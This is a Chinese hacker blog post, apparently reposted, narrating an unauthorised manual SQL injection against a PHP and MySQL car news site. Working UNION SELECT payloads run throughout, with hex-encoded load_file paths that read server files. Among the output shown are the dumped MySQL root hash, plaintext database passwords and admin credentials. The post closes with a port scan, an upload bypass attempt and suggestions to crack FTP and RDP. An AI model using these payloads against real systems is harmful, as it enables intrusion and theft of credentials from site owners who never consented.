一次典型的php+MySQL手工注射

一次典型的php+MySQL手工注射

大家好我是xxx,闲着无聊找个网站练练手，请出google “inurl:php？id=80 site：XXX 关键字”
很快找到一个有漏洞的网站：

http://www.hacked.cn/autocar/show.php?id=42

加”‘”，网页部分内容消失。and 1=1 正常;and 1=2消失。存在注入漏洞，好就件捡软柿子捏！
判断mysql版本:

http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=4正常
http://www.hacked.cn/autocar/show.php?id=42 and substring(@@version,1,1)=5不正常。
order by 1；order by 2正常，order by 3不正常。字段2个。
检测基本信息:
http://www.hacked.cn/autocar/show.php?id=-42 union select concat(@@version,0x3a,database(),0x3a,user()),2
得到
—————————
4.0.20a-nt:qiche:root@localhost
—————————
mysql用户root，mysql 4.0没法通过information_schema得到表名

只能才猜了
http://www.hacked.cn/autocar/show.php?id=42 union select 1.2 from admin
猜了常见的表名的均失败！郁闷！
尝试读取root密码
http://www.hacked.cn/autocar/show.php?id=-42 union select concat(user,0x3a,password),2 from mysql.user
返回：
———————————
root:5fcbb1f400e20be1
———————————
得到mysql的root密码可以用cain去破解，这个暂时放着。

查询文件权限。
http://www.hacked.cn/autocar/show.php?id=-42 union select file_priv,2 from mysql.user
返回
——————————-
Y
——————————-
有读取文件的权限，由mysql版本4.0.20a-nt得知目标主机为Window系统。
http://www.hacked.cn/autocar/show.php?id=-42 union select load_file(‘c:\boot.ini’),2
仍然返回空白，说明magic_qoutes=on,由于magic_qoutes=on我们无法通过 into outfile 来写shell。
郁闷！
但是我们可以读源文件！这就够了！

‘c:\boot.ini’16进制编码0x633a5c626f6f742e696e69
http://www.hacked.cn/autocar/show.php?id=-42 union select load_file(0x633a5c626f6f742e696e69),2
返回：
——————————–
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)WINNT=”Microsoft Windows 2000 Server” /fastdetect
——————————-
目标主机系统Window2000确定. 下一步找后台，

http://www.hacked.cn/autocar/admin/

返回
——————————-
Warning: main(autocar/adodb/conn.php) [function.main]: failed to open stream: No such file or directory in D:qichewebautocar/adminindex.php on line 1

Fatal error: main() [function.require]: Failed opening required ‘autocar/adodb/conn.php’ (include_path=’.;D:RUIOAwebroot;D:RUIOAwebrootincludes;D: uioaRUIOAphppear’) in D:qichewebautocar/adminindex.php on line 1
——————————–
直接告诉了我们数据库连接文件以及web路径，人品爆发了啊。

D:qichewebautocar/adodbconn.php
D:qichewebautocar/adminindex.php
接着找后台，两下猜中了！
后台地址：

http://www.hacked.cn/autocar/login.php

查看表单，猜测管理员表名，没什么作用。

开始用load_file读源文件

D:\qicheweb\autocar\adodb\conn.php

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20load_file(0x443a5c71696368657765625c6361725c61646f64625c636f6e6e2e706870),2

返回
——————————–
……
PConnect(’127.0.0.1′,’root’,'myoa888′,’qiche’);
……
$ypsm=1; $lxjsm=2; mysql_query(“SET NAMES GB2312″); /* $kd_conn = &ADONewConnection(‘mysql’); $kd_conn->PConnect(’127.0.0.1′,’highway’,'highway4438′,’highway’); */ $kd_conn=$conn; function err(){ echo
——————————–
获得mysql帐号密码
(’127.0.0.1′,’root’,'myoa888′,’qiche’)
(’127.0.0.1′,’highway’,'highway4438′,’highway’)

用得到的密码连接mysql，结果mysql不支持外连

用nmap顺便扫一下端口
——————————–
alone@alone-desktop:~/crk$ nmap -sT 127.0.0.1 -p 21,23,80,3306,1433,3389

Starting Nmap 4.53 ( http://insecure.org ) at 2009-08-23 16:58 CST
Interesting ports on 127.0.0.1:
PORT     STATE    SERVICE
21/tcp   open     ftp
23/tcp   filtered telnet
80/tcp   open     http
1433/tcp filtered ms-sql-s
3306/tcp open     mysql
3389/tcp open     ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 1.720 seconds
——————————–
用得到的帐号尝试ftp也登录不成功且ftp的banner显示
220 Serv-U FTP Server v6.1 for WinSock ready…
提权的时候可能用得到，这是后话不提。

接着读文件找到后台的表单和字段。
D:\qicheweb\autocar/login.php

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20load_file(0x443a5c71696368657765625c6361725c6c6f67696e2e706870),2

查看源代码，查找action
——————————–
<form name=”form1″ method=”post” action=”login_check.php”>
——————————–

读D:\qicheweb\autocar\login_check.php
密码不对这接转到别的页面，不让我查看代码。郁闷！
用repalce函数将load_file结果中的‘<’（0x3c）换成‘：’(0x3a)

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20replace(load_file(0x443a5c71696368657765625c6361725c6c6f67696e5f636865636b2e706870),0x3c,0x3a),2

找到
——————————–
if($username!=”" && $password!=”"){

$sql=”select ad_jb,ad_username from lm_admin where ltrim(rtrim(ad_username))=’$username’ and ltrim(rtrim(ad_password))=’$password’”;
// echo $sql;
$rs=$conn->Execute($sql);
——————————–
有了表名和字段名，现在我们直接读出后台密码

http://www.hacked.cn/autocar/show.php?id=-42%20union%20select%20concat(ad_username,0x3a,ad_password),2%20from%20lm_admin

得到
some:some
登录后台居然发现没法得到webshell，发现用的是
eWebEditor编辑器，而且web支持列目录。
找了半天
eWebEditor/upload.php里面有javascript验证后缀名，而且没有session验证可以直接上传，本地保存成html，添加php后缀允许上传。
结果jpg的文件能上传，php的还是传不上去。
eWebEditor目录

接着读下eWebEditor/upload.php源文件吧
——————————-
……
//检测扩展名的有效性

function CheckValidExt($sExt)

{

    global $sAllowExt;

    $aExt = explode("|",$sAllowExt);

    if (in_array($sExt, $aExt)) {

        Return 1;

    } else {

        OutScript("parent . UploadError('提示： 请选择一个有效的文件， 支持的格式有 （$sAllowExt）！')");

        Return 0;

    }

}

……
——————————-
发现php文件中貌似也检测了文件的后缀。
入侵就暂时到此吧。得到了新闻管理系统的后台。
我们可以读源文件，可以把文件挨着读出来说不定能找到一些漏洞呢。考虑到开了ftp，3389，可以尝试社会工程学，把数据库的密码都读去出来，用得到的密码尝试破解ftp或者3389。
真麻烦，不弄了就是玩玩跟他们又没仇何必那么认真啊。

来源： <http://www.0x50sec.org/pentest/2010/03/id/183/>